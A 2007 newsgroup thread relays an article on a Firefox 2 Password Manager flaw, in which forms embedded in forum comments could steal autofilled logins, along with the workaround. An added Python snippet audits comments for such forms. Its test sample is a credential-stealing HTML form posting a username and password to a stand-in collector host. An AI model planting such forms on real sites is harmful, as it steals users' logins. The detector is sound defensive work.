password flaw in Firefox 2


explorer

Jul 11, 2007, 10:32:05 PM
to RoCrack, alt.hacker, alt.2600, Windows
"Mozilla's Firefox 2.0 has long been considered a safer Web browser
than Microsoft's Internet Explorer, but a new flaw in the Firefox
Password Manager, which lets users store usernames and passwords for
trusted Web sites, could let hackers steal their login data.

The problem, known as a reverse cross-site request, or RCSR, was first
discovered by Robert Chapin, a Microsoft Certified Systems Engineer
(MCSE) and I.T. consultant. The RCSR appears on blogs, message boards,
or group forums that let users add comments with embedded HTML code.

On sites that allow users to enter code, a hacker can embed a form
that tricks the user's browser into sending its username and password
information to the hacker's computer. Because the form is embedded on
a trusted Web site, the browser's built-in antiphishing protection,
which is designed to alert users to fraudulent Web sites, does not
detect the problem."

Fix:

The Mozilla Foundation (the group behind the Firefox browser) has
classified it as Bug #360493 and also announced that it will be fixed
in version 2.0.0.1 or 2.0.0.2.

This attack can be avoided by disabling the browser's autosave
features for usernames and passwords. In Firefox, the feature is found
in the "Options" window under the "Tools" menu.

Well, fellows, a lot more security-related issues can be found at
http://xplor.byethost15.com/phpBB/index.php

I am actually not advertising this website; I am posting it here
because it's actually not possible for me to post each and every topic
present over there on this group.

Check it out if you want, it may be useful for you!
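
An added example, not part of the original post or of Mozilla's fix: a check a forum operator could run on submitted comments, since the quoted article says the flaw depends on sites that accept embedded HTML forms. The function names, the `forum.example` and `collector.invalid` URLs and the sample comments are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample comments (not taken from the thread).
SAMPLE_BAD = ('<p>nice post</p><form action="http://collector.invalid/save" method="post">'
              '<input name="user"><input type="PASSWORD" name="pass"></form>')
SAMPLE_OK = "<p>I agree, <b>disable</b> autosave.</p>"

class FormAudit(HTMLParser):
    """Records every <form> in a comment: resolved target and password-field flag."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []    # one dict per <form> seen
        self._open = None  # form currently being parsed

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # A missing or empty action submits back to the page itself.
            target = urljoin(self.page_url, (a.get("action") or "").strip())
            self._open = {"target": target, "password": False}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            if (a.get("type") or "").lower() == "password":
                self._open["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def origin(url):
    """Scheme, host and explicit port, used to compare form target and page."""
    p = urlsplit(url)
    return (p.scheme.lower(), (p.hostname or "").lower(), p.port)

def audit_comment(html, page_url):
    """Return (finding, target) per form; an empty list means no form at all."""
    parser = FormAudit(page_url)
    parser.feed(html)
    parser.close()
    findings = []
    for f in parser.forms:
        off_site = origin(f["target"]) != origin(page_url)
        kind = "credential form posts off-site" if f["password"] and off_site else "form in user content"
        findings.append((kind, f["target"]))
    return findings
```

Any non-empty result is grounds to reject or strip the comment; the off-site credential finding is the case the article describes.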

Ungureanu Adrian

Jul 12, 2007, 2:23:59 AM
to RoC...@googlegroups.com

Lately Microsoft is busy looking for bugs in
Firefox :)) I guess there aren't any left in their own
products ...

--- explorer <explor...@yahoo.com> wrote:


